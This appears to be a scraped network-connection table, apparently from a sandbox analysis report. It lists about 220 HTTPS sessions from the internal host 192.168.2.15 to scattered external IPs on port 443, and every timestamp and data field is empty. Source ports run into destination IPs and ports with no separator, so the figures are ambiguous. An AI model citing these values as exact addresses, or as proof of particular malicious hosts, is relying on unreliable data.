                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15854192.168.2.1553248209.173.94.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15855192.168.2.154839289.3.20.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15856192.168.2.15584249.117.48.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15857192.168.2.1555936179.11.215.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15858192.168.2.1543312198.90.233.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15859192.168.2.1556630118.184.40.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15860192.168.2.153360023.108.16.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15861192.168.2.1553750109.167.118.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15862192.168.2.1555884110.231.241.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15863192.168.2.1545358102.216.189.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15864192.168.2.1534518199.227.183.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15865192.168.2.154078264.40.205.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15866192.168.2.155743892.79.141.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15867192.168.2.154183668.228.75.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15868192.168.2.1544926133.120.47.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15869192.168.2.155379694.49.188.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15870192.168.2.1545538195.9.175.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15871192.168.2.1546496210.6.65.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15872192.168.2.1541324145.217.128.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15873192.168.2.1539032101.88.80.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15874192.168.2.1542804139.56.149.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15875192.168.2.155220857.38.224.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15876192.168.2.1556836136.135.132.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15877192.168.2.1541062218.196.4.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15878192.168.2.1558108187.63.205.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15879192.168.2.155774489.25.91.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15880192.168.2.1555700212.184.7.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15881192.168.2.1539588178.72.236.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15882192.168.2.1537158162.132.189.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15883192.168.2.153545451.215.168.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15884192.168.2.1553044106.188.30.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15885192.168.2.1552712216.181.245.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15886192.168.2.1534050222.76.96.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15887192.168.2.1542772193.151.122.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15888192.168.2.1548704160.120.97.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15889192.168.2.1535192107.9.197.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15890192.168.2.1555844191.89.237.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15891192.168.2.155472612.37.218.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15892192.168.2.1556580163.89.156.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15893192.168.2.155686245.96.111.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15894192.168.2.1551036170.236.158.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15895192.168.2.1552808213.86.41.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15896192.168.2.153899835.95.40.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15897192.168.2.154819681.48.30.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15898192.168.2.1543396125.57.54.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15899192.168.2.1541246185.190.19.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15900192.168.2.1543402202.219.175.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15901192.168.2.15360624.15.255.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15902192.168.2.1534128147.12.237.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15903192.168.2.155843658.218.244.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15904192.168.2.155357044.130.145.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15905192.168.2.153453013.185.107.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15906192.168.2.154813014.81.241.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15907192.168.2.1552818117.56.145.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15908192.168.2.15340364.164.126.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15909192.168.2.15380829.158.195.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15910192.168.2.1545022209.123.92.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15911192.168.2.1560912183.38.26.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15912192.168.2.1558762202.75.176.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15913192.168.2.1551774186.121.62.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15914192.168.2.1557984146.136.230.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15915192.168.2.1544536180.167.132.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15916192.168.2.1544030151.55.38.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15917192.168.2.155531676.98.208.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15918192.168.2.1540926135.138.73.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15919192.168.2.1537356105.249.7.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15920192.168.2.1550050123.1.73.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15921192.168.2.154243845.80.78.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15922192.168.2.1539462118.2.154.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15923192.168.2.154379896.228.68.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15924192.168.2.1545734138.159.18.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15925192.168.2.1536582162.235.116.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15926192.168.2.1560720110.207.203.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15927192.168.2.1536766210.92.210.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15928192.168.2.1540716158.41.200.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15929192.168.2.1558240211.123.135.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15930192.168.2.154160044.4.153.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15931192.168.2.153460457.73.211.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15932192.168.2.154849673.171.113.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15933192.168.2.1543716186.113.113.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15934192.168.2.155282882.133.97.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15935192.168.2.1535690163.133.172.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15936192.168.2.1549574162.213.129.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15937192.168.2.1533156193.197.62.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15938192.168.2.1548932102.184.22.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15939192.168.2.1549484140.197.194.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15940192.168.2.1533652180.5.60.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15941192.168.2.154787876.6.102.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15942192.168.2.155171248.20.168.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15943192.168.2.154199012.110.120.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15944192.168.2.154739291.20.139.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15945192.168.2.1539722126.2.124.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15946192.168.2.155785880.72.113.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15947192.168.2.155553476.7.237.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15948192.168.2.1535466145.133.60.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15949192.168.2.1545354105.67.80.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15950192.168.2.156019813.194.169.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15951192.168.2.1558966177.176.33.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15952192.168.2.1560064114.223.213.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15953192.168.2.1535848102.13.39.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15954192.168.2.1542570174.130.20.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15955192.168.2.155913696.149.230.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15956192.168.2.1560492128.0.126.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15957192.168.2.1544614115.159.222.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15958192.168.2.1552690128.193.177.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15959192.168.2.154352820.243.231.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15960192.168.2.155746238.234.214.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15961192.168.2.154028246.68.68.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15962192.168.2.1536450117.71.47.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15963192.168.2.1537712216.199.132.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15964192.168.2.1535948148.44.39.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15965192.168.2.1545752170.100.85.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15966192.168.2.1539746105.162.26.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15967192.168.2.1537698118.84.69.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15968192.168.2.1539812133.49.97.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15969192.168.2.1533540170.181.216.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15970192.168.2.1536932185.57.227.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15971192.168.2.1540418154.131.8.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15972192.168.2.153532451.227.14.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15973192.168.2.154739643.141.244.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15974192.168.2.153710093.251.84.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15975192.168.2.1541728156.80.214.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15976192.168.2.155193653.121.97.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15977192.168.2.1560174200.21.154.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15978192.168.2.155500066.249.247.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15979192.168.2.155997213.249.59.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15980192.168.2.1537054186.75.27.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15981192.168.2.1554162144.56.96.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15982192.168.2.1544428197.121.27.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15983192.168.2.1554868129.196.133.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15984192.168.2.153380842.145.85.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15985192.168.2.1554858138.126.250.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15986192.168.2.1556286160.91.217.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15987192.168.2.1549802106.110.183.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15988192.168.2.1546432203.191.187.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15989192.168.2.1560252124.47.87.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15990192.168.2.1547428210.222.208.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15991192.168.2.1542024200.254.138.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15992192.168.2.155210285.0.49.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15993192.168.2.1556988223.141.193.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15994192.168.2.155884676.71.83.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15995192.168.2.1540550147.9.63.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15996192.168.2.155697462.137.217.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15997192.168.2.1557462126.140.61.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15998192.168.2.1554102133.210.189.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15999192.168.2.1539762196.87.51.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16000192.168.2.154014669.120.194.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16001192.168.2.154570224.186.7.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16002192.168.2.1552796210.38.132.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16003192.168.2.154728652.95.20.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16004192.168.2.1551846137.31.191.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16005192.168.2.155286878.107.153.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16006192.168.2.1535922185.221.170.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16007192.168.2.1557294196.192.252.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16008192.168.2.1550980174.112.66.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16009192.168.2.154567893.87.122.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16010192.168.2.1545632194.106.225.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16011192.168.2.1536756190.62.33.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16012192.168.2.1547878117.185.136.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16013192.168.2.155586043.1.108.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16014192.168.2.1537190123.152.77.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16015192.168.2.1540922163.99.255.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16016192.168.2.154781638.241.82.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16017192.168.2.154752257.225.71.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16018192.168.2.154230290.87.46.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16019192.168.2.153535214.52.36.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16020192.168.2.1554876104.58.249.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16021192.168.2.1547878169.65.70.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16022192.168.2.1553214126.229.62.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16023192.168.2.15338928.217.104.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16024192.168.2.1539828137.197.81.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16025192.168.2.1537732125.14.71.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16026192.168.2.154393096.175.103.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16027192.168.2.155845839.94.100.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16028192.168.2.1533068177.42.120.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16029192.168.2.1543136152.5.229.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16030192.168.2.15456682.243.161.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16031192.168.2.1538042138.29.102.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16032192.168.2.1533230105.206.169.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16033192.168.2.1552720172.145.103.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16034192.168.2.156069865.21.23.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16035192.168.2.153326691.42.92.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16036192.168.2.1557620206.14.78.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16037192.168.2.155397474.243.80.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16038192.168.2.15479968.159.250.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16039192.168.2.15473445.75.101.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16040192.168.2.1537778197.44.78.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16041192.168.2.1545128139.21.104.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16042192.168.2.1534926208.241.91.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16043192.168.2.15439401.206.91.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16044192.168.2.155664812.196.171.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16045192.168.2.154351624.167.134.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16046192.168.2.1534136180.67.36.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16047192.168.2.1550788118.242.213.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16048192.168.2.1550072186.50.9.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16049192.168.2.154337437.23.164.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16050192.168.2.1543392144.127.237.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16051192.168.2.153650853.172.239.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16052192.168.2.1545246195.109.110.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16053192.168.2.1546726107.207.148.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16054192.168.2.155755485.67.214.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16055192.168.2.1534424149.58.106.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16056192.168.2.153474496.86.43.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16057192.168.2.154040096.189.172.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16058192.168.2.1557790199.213.202.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16059192.168.2.1543942153.60.26.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16060192.168.2.1536366151.80.33.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16061192.168.2.1549456156.186.195.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16062192.168.2.1536200128.124.250.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16063192.168.2.1534654163.6.53.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16064192.168.2.1547056208.67.85.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16065192.168.2.153580061.126.110.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16066192.168.2.154364897.70.49.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16067192.168.2.1533216106.203.153.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16068192.168.2.15495124.209.248.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16069192.168.2.154504076.147.182.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16070192.168.2.155688691.55.225.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16071192.168.2.1559012219.209.7.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16072192.168.2.154453840.39.250.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16073192.168.2.155058219.177.223.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16074192.168.2.1537444171.45.84.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
